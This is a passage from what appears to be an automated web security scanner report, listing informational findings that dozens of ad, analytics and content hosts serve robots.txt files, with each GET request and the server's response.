
The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: as.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 08 Oct 2010 18:16:00 GMT
ETag: "17b0172-1a-afb800"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Expires: Fri, 06 May 2011 20:28:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 06 May 2011 20:28:10 GMT
Connection: close

User-agent: *
Disallow: /
29.15. http://b.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/plain
Last-Modified: Thu, 14 Apr 2011 22:28:58 GMT
Accept-Ranges: bytes
ETag: "0b18f58f3facb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Fri, 06 May 2011 20:28:08 GMT
Connection: keep-alive
Content-Length: 28

User-agent: *
Disallow: /
29.16. https://broker.gotoassist.com/h/lbmc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://broker.gotoassist.com
Path:   /h/lbmc

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: broker.gotoassist.com

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:43:47 GMT
Server: Apache
Last-Modified: Wed, 16 Feb 2011 21:22:59 GMT
ETag: "1b80002-18-49c6ce29a32c0"
Accept-Ranges: bytes
Content-Length: 24
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow:
29.17. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn-cms.scout.com
Path:   /feeds/analyticsfeed.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn-cms.scout.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Content-Location: http://cdn-cms.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
ETag: "0abd1598770cb1:ef7"
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
Akamai: True
Date: Fri, 06 May 2011 19:29:04 GMT
Content-Length: 135
Connection: close
Akamai: True

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx
29.18. http://cdn-forums.scout.com/adfeed.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn-forums.scout.com
Path:   /adfeed.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn-forums.scout.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Content-Location: http://cdn-forums.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 00:08:38 GMT
Server: Microsoft-IIS/6.0
Server: MBRD-Static3
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 19:29:05 GMT
Content-Length: 81
Connection: close
Akamai: True

...User-agent: *
Disallow:
Sitemap: http://mbd.scout.com/forumsitemapindex.aspx
29.19. http://clients1.google.com/webpagethumbnail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clients1.google.com
Path:   /webpagethumbnail

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clients1.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 May 2011 07:55:46 GMT
Date: Sat, 07 May 2011 01:26:20 GMT
Expires: Sat, 07 May 2011 01:26:20 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
29.20. http://clk.atdmt.com/AVE/go/173511812AD54EE6ABF0CBB5D825DA4F/direct/01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /AVE/go/173511812AD54EE6ABF0CBB5D825DA4F/direct/01

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Content-Length: 101
Content-Type: image/gif
Date: Sat, 07 May 2011 01:22:04 GMT
Connection: close

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:
29.21. http://d.xp1.ru4.com/activity  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /activity

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 06 May 2011 22:33:40 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/plain
Last-modified: Fri, 31 Jul 2009 18:32:10 GMT
Content-length: 26
Etag: "1a-4a7338aa"
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /
29.22. http://dce.sapha.com/engine.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dce.sapha.com
Path:   /engine.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dce.sapha.com

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:25 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 18 Oct 2008 22:29:29 GMT
ETag: "6d095cd-27-9d78a440"
Accept-Ranges: bytes
Content-Length: 39
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt
User-agent: *
Disallow: /
29.23. http://dinclinx.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dinclinx.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dinclinx.com

Response

HTTP/1.1 200 OK
Content-Length: 28
Content-Type: text/plain
Content-Location: http://dinclinx.com/robots.txt
Last-Modified: Thu, 06 Aug 2009 19:25:52 GMT
Accept-Ranges: bytes
ETag: "020efb5cb16ca1:18c9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 21:49:55 GMT
Connection: close

User-agent: *
Disallow: /
29.24. http://expedia-www.baynote.net/baynote/tags3/common  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://expedia-www.baynote.net
Path:   /baynote/tags3/common

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: expedia-www.baynote.net

Response

HTTP/1.1 200 OK
Server: BNServer
Accept-Ranges: bytes
ETag: W/"216-1304718602000"
Last-Modified: Fri, 06 May 2011 21:50:02 GMT
Content-Type: text/plain
Content-Length: 216
Date: Fri, 06 May 2011 22:33:42 GMT
Connection: close

User-agent: *
Disallow: /baynote/
Disallow: /error400.html
Disallow: /error403.html
Disallow: /error404.html
Disallow: /error500.html
Disallow: /index.jsp
Disallow: /search/
Disallow: /socialsearch/
D
...[SNIP]...
29.25. http://expedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://expedia.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: expedia.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 May 2011 22:33:31 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html
Cache-control: private
Content-Length: 554

User-agent: *
Allow: /
Disallow: /daily/common/
Disallow: /cd/
Disallow: /pub/agent.dll?qscr=mrdt
Disallow: /pub/agent.dll?qscr=mrdr
Disallow: /daily/vacations/merch/
Disallow: /daily/ho
...[SNIP]...
29.26. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Fri, 06 May 2011 22:33:36 GMT
Server: Floodlight server
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /
29.27. http://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fpdownload2.macromedia.com
Path:   /pub/shockwave/cabs/flash/swflash.cab

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fpdownload2.macromedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 09 Nov 2005 18:44:30 GMT
ETag: "2a203d-1a-474d7f80"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Sat, 07 May 2011 01:47:45 GMT
Connection: close

User-agent: *
Disallow: /
29.28. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Fri, 06 May 2011 20:08:41 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /
29.29. http://haymarketbusinesspublications.122.2o7.net/b/ss/haymarketscmagazineus/1/H.21/s84503894906956  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://haymarketbusinesspublications.122.2o7.net
Path:   /b/ss/haymarketscmagazineus/1/H.21/s84503894906956

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: haymarketbusinesspublications.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:50:03 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "2799e1-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www316
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
29.30. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/728x90_Patch.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:50:15 GMT
Server: Apache
Last-Modified: Sat, 10 Mar 2007 17:40:16 GMT
ETag: "1b1a-1a-42b5608766000"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /
29.31. http://int.teracent.net/tase/int  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: int.teracent.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1302740848000"
Last-Modified: Thu, 14 Apr 2011 00:27:28 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sat, 07 May 2011 01:50:38 GMT
Connection: close

User-agent: *
Disallow: /
29.32. http://jlinks.industrybrains.com/jsct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: jlinks.industrybrains.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 May 2011 21:49:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/plain
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 06 May 2011 21:49:59 GMT
Content-Length: 26

User-agent: *
Disallow: /
29.33. http://l.addthiscdn.com/live/t00/250lo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.addthiscdn.com
Path:   /live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 07 Apr 2011 11:47:15 GMT
ETag: "de0256-1b-4a052abaf56c0"
Content-Type: text/plain; charset=UTF-8
Date: Sat, 07 May 2011 01:17:44 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

29.34. https://mosaicsecurity.com/products/1919-pci-scan-annual  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mosaicsecurity.com
Path:   /products/1919-pci-scan-annual

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mosaicsecurity.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 07 May 2011 01:32:10 GMT
Content-Type: text/plain
Content-Length: 260
Last-Modified: Thu, 07 Apr 2011 19:08:22 GMT
Connection: close
Accept-Ranges: bytes

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...
29.35. http://nba.scout.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nba.scout.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nba.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: http://nba.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:10e3"
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 19:30:42 GMT
Connection: close

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx
29.36. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/plain
Last-Modified: Thu, 31 Mar 2011 18:11:40 GMT
Accept-Ranges: bytes
ETag: "056315cfefcb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:24:04 GMT
Connection: keep-alive
Content-Length: 44

# do not index
User-agent: *
Disallow: /
29.37. http://om.expedia.com/b/ss/expedia1/1/G.9p2/s91449721802491  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://om.expedia.com
Path:   /b/ss/expedia1/1/G.9p2/s91449721802491

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: om.expedia.com

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:33:42 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "36c78a-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www2
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
29.38. http://p.addthis.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.addthis.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: p.addthis.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 07 May 2011 01:17:47 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /
29.39. http://poll.websitegear.com/compactpoll.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://poll.websitegear.com
Path:   /compactpoll.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: poll.websitegear.com

Response

HTTP/1.1 200 OK
Content-Length: 109
Content-Type: text/plain
Last-Modified: Mon, 04 Oct 2004 22:13:00 GMT
Accept-Ranges: bytes
ETag: "03e2a4f5faac41:16a6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 19:30:33 GMT
Connection: close

# Dont allow search engines to index specific folders
User-agent: *
Disallow: /include
Disallow: /images
29.40. http://pub.kroogy.com/www/delivery/ajs.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pub.kroogy.com
Path:   /www/delivery/ajs.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pub.kroogy.com

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:03:33 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 28 Apr 2011 08:15:03 GMT
ETag: "968764-17a-4a1f627774fc0"
Accept-Ranges: bytes
Content-Length: 378
Vary: Accept-Encoding
X-Powered-By: PleskLin
Connection: close
Content-Type: text/plain

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...
29.41. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/plain
Last-Modified: Thu, 14 Apr 2011 22:28:58 GMT
Accept-Ranges: bytes
ETag: "0b18f58f3facb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Fri, 06 May 2011 19:30:47 GMT
Connection: keep-alive
Content-Length: 28

User-agent: *
Disallow: /
29.42. http://recruiting.scout.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recruiting.scout.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: recruiting.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: http://recruiting.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:10e3"
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 21:41:57 GMT
Connection: close

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx
29.43. http://s7.addthis.com/js/250/addthis_widget.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s7.addthis.com
Path:   /js/250/addthis_widget.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s7.addthis.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 28 Apr 2011 11:30:25 GMT
ETag: "cc0d3a-1b-4a1f8e226d640"
Content-Type: text/plain; charset=UTF-8
Date: Sat, 07 May 2011 01:17:16 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

29.44. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYrIUDILCFAzIFrMIAAB8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing-cache.google.com
Path:   /safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYrIUDILCFAzIFrMIAAB8

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing-cache.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 May 2011 07:55:46 GMT
Date: Fri, 06 May 2011 17:30:03 GMT
Expires: Fri, 06 May 2011 17:30:03 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
29.45. http://safebrowsing.clients.google.com/safebrowsing/downloads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 May 2011 07:55:46 GMT
Date: Fri, 06 May 2011 17:30:02 GMT
Expires: Fri, 06 May 2011 17:30:02 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
29.46. http://scouthoops.scout.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scouthoops.scout.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: scouthoops.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: http://scouthoops.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:10e3"
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 19:30:37 GMT
Connection: close

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx
29.47. https://seals.networksolutions.com/siteseal_seek/siteseal  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://seals.networksolutions.com
Path:   /siteseal_seek/siteseal

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: seals.networksolutions.com

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:16:27 GMT
Server: Apache
Last-Modified: Tue, 24 Apr 2007 14:01:59 GMT
ETag: "1a-42edc3aade3c0"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Cache-Control: max-age=86400
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /
29.48. http://search.twitter.com/search.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.twitter.com
Path:   /search.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: search.twitter.com

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:50:27 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 18:03:57 GMT
Accept-Ranges: bytes
Content-Length: 45
Cache-Control: max-age=86400
Expires: Sun, 08 May 2011 01:50:27 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /search
Disallow: /*?
29.49. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Fri, 06 May 2011 19:11:33 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /
29.50. http://spe.atdmt.com/ds/M8MEDPMPRPPR/PP.1001_machupicchu_01_300x250_eng.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /ds/M8MEDPMPRPPR/PP.1001_machupicchu_01_300x250_eng.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 68
Allow: GET
Expires: Wed, 11 May 2011 21:46:46 GMT
Date: Sat, 07 May 2011 11:30:17 GMT
Connection: close

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:
29.51. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.138.17.185
Date: Fri, 06 May 2011 22:33:53 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...
29.52. http://static01.linkedin.com/scds/concat/common/css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static01.linkedin.com
Path:   /scds/concat/common/css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static01.linkedin.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=604800
Content-Type: text/plain
Date: Fri, 06 May 2011 17:44:48 GMT
ETag: "1162225322"
Expires: Fri, 13 May 2011 17:44:48 GMT
Last-Modified: Wed, 06 Apr 2011 03:23:47 GMT
Server: ECS (dca/5339)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 24473
Connection: close

# Notice: If you would like to crawl LinkedIn,
# please email whitelistcrawl@linkedin.com to apply
# for white listing.

User-agent: Googlebot
Disallow: /addContacts*
Disallow: /addressBookExport*
D
...[SNIP]...
29.53. http://static02.linkedin.com/scds/concat/common/js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static02.linkedin.com
Path:   /scds/concat/common/js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static02.linkedin.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=604800
Content-Type: text/plain
Date: Fri, 06 May 2011 17:45:03 GMT
ETag: "1162225322"
Expires: Fri, 13 May 2011 17:45:03 GMT
Last-Modified: Wed, 06 Apr 2011 03:23:47 GMT
Server: ECS (dca/5339)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 24473
Connection: close

# Notice: If you would like to crawl LinkedIn,
# please email whitelistcrawl@linkedin.com to apply
# for white listing.

User-agent: Googlebot
Disallow: /addContacts*
Disallow: /addressBookExport*
D
...[SNIP]...
29.54. http://support.expedia.com/app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.expedia.com
Path:   /app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: support.expedia.com

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:40:11 GMT
Server: Apache
Last-Modified: Tue, 14 Sep 2010 15:07:55 GMT
Accept-Ranges: bytes
Content-Length: 982
RNT-Time: D=6386 t=1304721611971673
RNT-Machine: 04
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://support.expedia.com/ci/sitemap/ # ADDED BY HMS

User-agent: Baynote-Nutch # CUSTOM
Disallow: # CUSTOM
User-agent: Googlebot # Google # CUSTOM
Disal
...[SNIP]...
29.55. http://suth.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://suth.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: suth.com

Response

HTTP/1.1 200 OK
Content-Length: 343
Content-Type: text/plain
Last-Modified: Mon, 03 May 2010 20:35:11 GMT
Accept-Ranges: bytes
ETag: "69c46d200ebca1:1ad01"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 21:55:17 GMT
Connection: close

User-agent: *
Disallow: /App_Code/*
Disallow: /aspnet_client/*
Disallow: /Attachments/*
Disallow: /common/*
Disallow: /Delve/*
Disallow: /flex/*
Disallow: /oo/*
Disallow: /survey/*
Disallow:
...[SNIP]...
29.56. http://sync.mathtag.com/sync/img  previous  next

Summary

